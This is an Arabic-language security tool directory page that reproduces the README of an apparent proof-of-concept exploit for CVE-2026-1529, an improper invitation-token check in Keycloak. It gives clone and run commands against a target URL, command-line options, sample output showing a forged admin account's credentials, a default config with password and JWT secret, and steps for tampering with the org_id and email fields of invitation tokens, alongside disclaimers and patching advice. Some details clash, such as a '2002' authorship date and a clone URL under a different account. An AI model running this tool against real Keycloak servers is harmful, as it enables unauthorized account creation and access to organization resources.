Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/ackemed/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةأمن واجهات برمجة التطبيقات
GitHubackemed/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation

CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation

أداة استغلال لثغرة CVE-2026-1529، توضح تسجيل مؤسسة غير مصرح به في Keycloak عبر التلاعب برمز JWT. تتضمن توليد الرمز، والتلاعب به، وتسجيل المستخدم مع إنشاء تقرير.

عرض المستودعالموقع الإلكتروني
منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أداة استغلال ثغرة CVE-2026-1529 في Keycloak

Keycloak: تسجيل مؤسسات غير مصرح به عبر التحقق غير السليم من رمز الدعوة


إخلاء مسؤولية

هذه الأداة مخصصة لأغراض التعليم واختبار الأمان فقط. استخدمها فقط على الأنظمة التي لديك إذن صريح لاختبارها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني وغير أخلاقي. مؤلفو هذه الأداة غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.

أنشأها: f3ds cr3w est، 2002


نظرة عامة

CVE-2026-1529 هي ثغرة أمنية حرجة في Keycloak تسمح بتسجيل مؤسسات غير مصرح به عبر التحقق غير السليم من رمز الدعوة. توضح هذه الأداة الاستغلالية الثغرة من خلال التلاعب برموز JWT لتسجيل المستخدمين في مؤسسات غير مصرح بها.

التفاصيل الفنية

  • معرف CVE: CVE-2026-1529
  • البرنامج المتأثر: Keycloak (org.keycloak.services.resources.organizations)
  • درجة CVSS: 8.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
  • متجه الهجوم: الشبكة
  • تعقيد الهجوم: منخفض
  • التأثير: وصول غير مصرح به إلى موارد المؤسسة

وصف الثغرة

توجد الثغرة في عملية التحقق من رمز JWT لدعوات المؤسسات. يمكن للمهاجمين التلاعب بحقلي org_id و email في حمولة JWT، مما يسمح لهم بتسجيل المستخدمين في أي مؤسسة دون الحصول على إذن مناسب.


التثبيت

المتطلبات الأساسية

  • Python 3.7 أو أحدث
  • مدير الحزم pip

الإعداد

  1. استنسخ أو حمّل أداة الاستغلال:
root@kitploit:~
git clone https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation
cd CVE-2026-1529-POC
  1. ثبّت التبعيات المطلوبة:
root@kitploit:~
pip install -r requirements.txt
  1. اجعل سكربت الاستغلال قابلاً للتنفيذ:
root@kitploit:~
chmod +x keycloak-exploit.py

الاستخدام

الاستخدام الأساسي

root@kitploit:~
# الاستخدام القياسي مع عنوان URL الهدف
python keycloak-exploit.py https://target-keycloak.com

# عرض المساعدة
python keycloak-exploit.py -h

# عرض الإصدار
python keycloak-exploit.py -v

الاستخدام المتقدم

root@kitploit:~
# استخدام رمز دعوة مخصص
python keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 https://target-keycloak.com

# استخدام معرف مؤسسة مخصص
python keycloak-exploit.py -o custom_org_id https://target-keycloak.com

# استخدام ملف إعدادات مخصص
python keycloak-exploit.py -c custom_config.json https://target-keycloak.com

# تفعيل تسجيل التصحيح
python keycloak-exploit.py -d https://target-keycloak.com

خيارات سطر الأوامر

الخيارالوصفمطلوب
targetعنوان URL لـ Keycloak الهدف (IP أو نطاق)نعم
-t, --tokenرمز دعوة مخصص للاستخداملا
-o, --org-idمعرف مؤسسة مخصصلا
-c, --configمسار ملف الإعداداتلا
-d, --debugتفعيل تسجيل التصحيحلا
-v, --versionعرض معلومات الإصدارلا
-h, --helpعرض رسالة المساعدةلا

المخرجات

استغلال ناجح

عند نجاح الاستغلال، سترى مخرجات مثل:

root@kitploit:~
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✓ Target is vulnerable to CVE-2026-1529

🎯 EXPLOIT SUCCESSFUL!
Username: admin_user_2026
Password: KeycloakCVE2026!
Email: [email protected]
Login Link: https://target-keycloak.com/realms/master/account

📄 Report saved to: output/reports/exploit_report_20260210_134556.txt

🔐 Use the provided credentials to access the Keycloak instance!
⚠️  This demonstrates unauthorized access due to CVE-2026-1529

=============================================================
by f3ds cr3w est, 2002
=============================================================

استغلال فاشل

إذا فشل الاستغلال، سترى:

root@kitploit:~
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✗ Target is not vulnerable

❌ EXPLOIT FAILED!
Check logs for details: logs/exploit.log

هيكل المشروع

root@kitploit:~
CVE-2026-1529-POC/
├── keycloak-exploit.py          # Main exploit script
├── requirements.txt             # Python dependencies
├── README.md                   # This file
├── config/
│   └── default_config.json     # Default configuration
├── utils/
│   ├── jwt_utils.py            # JWT manipulation utilities
│   ├── http_utils.py           # HTTP client utilities
│   └── crypto_utils.py         # Cryptographic utilities
├── output/
│   ├── logs/                   # Log files
│   └── reports/                # Exploit reports

الإعدادات

الإعدادات الافتراضية

تستخدم الأداة ملف إعدادات افتراضي (config/default_config.json) بالإعدادات التالية:

root@kitploit:~
{
  "exploit": {
    "default_username": "admin_user_2026",
    "default_password": "KeycloakCVE2026!",
    "default_email": "[email protected]",
    "timeout": 30,
    "max_retries": 3
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "keycloak-cve-2026-1529-exploit",
    "token_expiry": 3600
  },
  "target": {
    "endpoints": {
      "realms": "/realms",
      "organizations": "/organizations",
      "register": "/register",
      "login": "/login"
    }
  },
  "output": {
    "log_level": "INFO",
    "save_reports": true,
    "report_format": "txt"
  }
}

إعدادات مخصصة

يمكنك إنشاء ملف إعدادات مخصص واستخدامه مع الخيار -c:

root@kitploit:~
{
  "exploit": {
    "default_username": "custom_user",
    "default_password": "CustomPassword123!",
    "default_email": "[email protected]",
    "timeout": 60,
    "max_retries": 5
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "custom-secret-key",
    "token_expiry": 7200
  }
}

التفاصيل الفنية

عملية الاستغلال

  1. تحليل الهدف: التحقق مما إذا كان الهدف مثيل Keycloak قابلًا للاستغلال
  2. توليد الرمز: توليد أو استخدام رمز دعوة مخصص
  3. التلاعب بالرمز: التلاعب بحمولة JWT لتغيير معرف المؤسسة
  4. تسجيل المستخدم: تسجيل مستخدم باستخدام الرمز المتلاعب به
  5. اختبار تسجيل الدخول: التحقق من قدرة المستخدم المُنشأ على تسجيل الدخول
  6. توليد التقرير: إنشاء تقرير استغلال مفصل

التلاعب بـ JWT

تستغل الأداة التحقق غير السليم من JWT من خلال:

  1. فك تشفير رمز JWT دون التحقق من التوقيع
  2. تعديل حقل org_id لاستهداف مؤسسة مختلفة
  3. تعديل حقل email إذا لزم الأمر
  4. إعادة ترميز الرمز بالحمولة المتلاعب بها

اعتبارات الأمان

  • تستخدم الأداة معالجة أخطاء وتسجيلًا مناسبين
  • تتضمن جميع طلبات الشبكة ترويسات مناسبة
  • يتم إجراء التحقق من صحة الإدخال على جميع مدخلات المستخدم
  • تحترم الأداة رموز استجابة الخادم الهدف

استكشاف الأخطاء وإصلاحها

المشكلات الشائعة

  1. أخطاء الاتصال

    • تحقق من إمكانية الوصول إلى عنوان URL الهدف
    • تحقق من أن الهدف هو مثيل Keycloak
    • تحقق من اتصال الشبكة وإعدادات جدار الحماية
  2. أخطاء التحقق من الرمز

    • تأكد من صحة تنسيق الرمز
    • تحقق من أن الرمز يحتوي على الحقول المطلوبة (org_id, email, invitation_type)
    • تحقق من عدم انتهاء صلاحية الرمز
  3. فشل التسجيل

    • تحقق من إمكانية الوصول إلى نقطة نهاية التسجيل
    • تحقق من تنسيق الرمز المتلاعب به
    • تحقق من تفعيل تسجيل المؤسسات في الهدف

وضع التصحيح

فعّل تسجيل التصحيح لاستكشاف الأخطاء بالتفصيل:

root@kitploit:~
python keycloak-exploit.py -d https://target-keycloak.com

ملفات السجل

  • السجل الرئيسي: logs/exploit.log
  • التقارير: output/reports/exploit_report_YYYYMMDD_HHMMSS.txt

منهجية الاختبار

تقييم الثغرة

تؤدي الأداة الفحوصات التالية:

  1. فحص الصحة: التحقق من أن الهدف هو مثيل Keycloak
  2. اكتشاف الإصدار: محاولة اكتشاف إصدار Keycloak
  3. اختبار نقاط النهاية: اختبار نقاط النهاية المتعلقة بالمؤسسات
  4. التحقق من الرمز: التحقق من بنية رمز JWT

التحقق من الاستغلال

يُعتبر الاستغلال ناجحًا إذا:

  1. كان الهدف قابلًا للاستغلال
  2. يمكن تسجيل مستخدم باستخدام الرمز المتلاعب به
  3. يمكن للمستخدم المُسجل تسجيل الدخول بنجاح
  4. يتم توليد رابط تسجيل دخول صالح

أفضل ممارسات الأمان

للمؤسسات

  1. تطبيق التصحيحات: التحديث إلى أحدث إصدار من Keycloak
  2. التحقق من الرمز: تنفيذ التحقق السليم من توقيع JWT
  3. التحكم في الوصول: تقييد تسجيل المؤسسات على المستخدمين المصرح لهم
  4. المراقبة: مراقبة أنشطة التسجيل المشبوهة
  5. أمان الشبكة: تنفيذ قواعد جدار حماية مناسبة

لباحثي الأمان

  1. التفويض: اختبر فقط الأنظمة التي لديك إذن لاختبارها
  2. الإفصاح المسؤول: أبلغ البائعين بالثغرات
  3. التوثيق: احتفظ بسجلات مفصلة لاختباراتك
  4. الاختبار الأخلاقي: اتبع ممارسات الإفصاح المسؤول

الترخيص

هذه الأداة مقدمة لأغراض التعليم واختبار الأمان فقط. استخدمها على مسؤوليتك الخاصة.

أنشأها: f3ds cr3w est، 2002

للتواصل: للأسئلة أو الملاحظات، يرجى الرجوع إلى مستودع المشروع.


سجل التغييرات

الإصدار 1.0

  • الإصدار الأولي
  • وظيفة الاستغلال الأساسية
  • قدرات التلاعب بـ JWT
  • توليد التقارير
  • واجهة سطر الأوامر

🙏 شكر وتقدير

  • فريق تطوير Keycloak
  • باحثو الأمان الذين اكتشفوا CVE-2026-1529
  • مجتمع الأمان مفتوح المصدر

تذكر: القوة العظيمة تأتي مع مسؤولية عظيمة. استخدم هذه الأداة بحكمة وأخلاقية.

بواسطة f3ds cr3w est، 2002

تنزيل الأداة